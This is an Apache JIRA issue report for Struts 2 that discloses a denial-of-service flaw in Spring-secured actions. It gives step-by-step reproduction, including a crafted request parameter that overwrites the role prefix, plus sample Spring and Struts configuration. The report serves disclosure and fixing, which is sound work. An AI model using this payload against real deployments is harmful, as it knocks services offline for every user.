[jira] [Created] (WW-4805) At least a DoS attack is available for Spring secured actions

[Yasser Zamani (JIRA)]

Yasser Zamani created WW-4805:
---------------------------------

             Summary: At least a DoS attack is available for Spring secured 
actions
                 Key: WW-4805
                 URL: https://issues.apache.org/jira/browse/WW-4805
             Project: Struts 2
          Issue Type: Improvement
          Components: Core, Plugin - Spring
    Affects Versions: 2.5.10, 2.3.32
            Reporter: Yasser Zamani
             Fix For: 2.3.33, 2.5.next


This is a DoS attack example when Struts2 user uses Spring to secure his 
actions, like mentioned at section `Initializing Actions from Spring` of 
https://struts.apache.org/docs/spring-plugin.html

Attack Steps:
1. An anonymous user logins as an authenticated user.
2. Then tries 
http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
 where {action0-actionN} are actions available for users

Attack Impacts:
By replacing `rolePrefix`, attacker blocks access to secured actions for all 
defined roles even if they authenticate via login! so services are down and 
webapp restart is required to back to normal!!!

Configuration Example:
1. spring-security.xml
    <global-method-security secured-annotations="enabled" proxy-target-class = 
"true" />
    <http auto-config="true" use-expressions="false">
        <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
    </http>
    <authentication-manager erase-credentials="false">
        <authentication-provider>
            <user-service>
                <user name="admin" password="admin" authorities="ROLE_ADMIN" />
                <user name="user" password="user" authorities="ROLE_USER" />
            </user-service>
        </authentication-provider>
    </authentication-manager>

2. applicationContext.xml
<bean id="secureAction" 
class="me.zamani.yasser.ww_convention.actions.SecureAction"/>

3. struts.xml

        <action name="admin" class="secureAction" method="admin">
            <result name="success" type="json" />
        </action>
        <action name="user" class="secureAction" method="user">
            <result name="success" type="json" />
        </action>

4. SecureAction.java
package me.zamani.yasser.ww_convention.actions;
import org.springframework.security.access.annotation.Secured;

public class SecureAction {

    @Secured({"ROLE_ADMIN"})
    public String admin() {
        return "success";
    }
    @Secured({"ROLE_USER"})
    public String user() {
        return "success";
    }
}

5. login via http://{ip}:{port}/login as user.

6. open 
http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit

7. in another browser, login via http://{ip}:{port}/login as admin.

8. try to access http://{ip}:{port}/admin which fails!

9. also repeat 5 and try open http://{ip}:{port}/user which also fails!

10. Services are down and webapp restart is required to back to normal.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)